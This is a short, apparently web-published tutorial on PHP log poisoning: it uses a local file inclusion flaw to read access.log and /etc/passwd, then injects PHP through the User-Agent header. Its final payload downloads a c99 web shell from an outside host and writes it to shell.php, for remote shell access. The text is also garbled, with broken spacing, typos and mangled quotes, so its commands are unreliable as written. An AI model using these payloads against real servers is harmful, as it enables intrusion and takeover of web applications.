Log poisoning is a technique that not many know about.
this technique works only if you can make an LFI of the page.
if we say that you call index.php, which is vulnerable to LFI
and writes index.php? inc =../../../ var / www / logs / access.log

So you see that it will produce a logfile.
that looks something like this:
11.11.11.11 – – [05/Feb/2004: 21:34:01 -0600] “GET / tindex.php? Inc = HTTP/1.1” 200 230 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1 ; en-US, rv: 1.8.1.11) Gecko/20071127 Firefox/2.0.0.11 ”
11.11.11.11 – – [05/Feb/2004: 21:34:04 -0600] “GET / tindex.php? Inc =../../../ etc / passwd HTTP/1.1” 200 175 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US, rv: 1.8.1.11) Gecko/20071127 Firefox/2.0.0.11”
11.11.11.11– [05/Feb/2004: 21:34:07 -0600] “GET / index.php? Inc = test.php HTTP/1.1” 200 134 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US, rv: 1.8.1.11) Gecko/20071127 Firefox/2.0.0.11 ”
11.11.11.11 – – [05/Feb/2004: 21:34:08 -0600] “GET / index.php? Inc =../../../ var / www / logs / access.log HTTP/1.1 “200 164” – “” Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US, rv: 1.8.1.11) Gecko/20071127 Firefox/2.0.0.11 ”

As you can see logs serve our user-agent
If we change our user-agent to: <? Php echo ‘test’;?>
Can we hope the following restultat:
11.11.11.11 – – [05/Feb/2004: 21:34:01 -0600] “GET / tindex.php? Inc = HTTP/1.1” 200 230 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1 ; en-US, rv: 1.8.1.11) Gecko/20071127 Firefox/2.0.0.11 ”
11.11.11.11 – – [05/Feb/2004: 21:34:04 -0600] “GET / tindex.php? Inc =../../../ etc / passwd HTTP/1.1” 200 175 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US, rv: 1.8.1.11) Gecko/20071127 Firefox/2.0.0.11”
11.11.11.11– [05/Feb/2004: 21:34:07 -0600] “GET / index.php? Inc = test.php HTTP/1.1” 200 134 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US, rv: 1.8.1.11) Gecko/20071127 Firefox/2.0.0.11 ”
11.11.11.11 – – [05/Feb/2004: 21:34:08 -0600] “GET / index.php? Inc =../../../ var / www / logs / access.log HTTP/1.1 “200 164” – “” test ”
As you can see, were running our PHP question.
change it as our user-agent to:
<? php fwrite (fopen ( ‘shell.php’, ‘w’), file_get_contents ( ‘hxxp: / / hack3r.org/path/to/c99.txt’)); die;?>
so it creates a file called shell.php with our shell script in.
And wopidoo, we have shell access.

Explore More

CRLF Injection

CRLF Injection Overview CRLF Injection is typically used in HTTP Response Splitting. In the HTTP specification there is a spec stating that the HTTP header is to be split from

Read More

What is a cookie?

A cookie is a small bit of text that accompanies requests and pages as they move between Web servers and browsers. It contains information that is read by a Web

Read More

Critical SQL Injection in Enjoy (http://www.enjoy.net.mm)

PlanetCreator reported another critical SQL injection (vulnerability) on several sites of Enjoy (http://www.enjoy.net.mm) SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer

Read More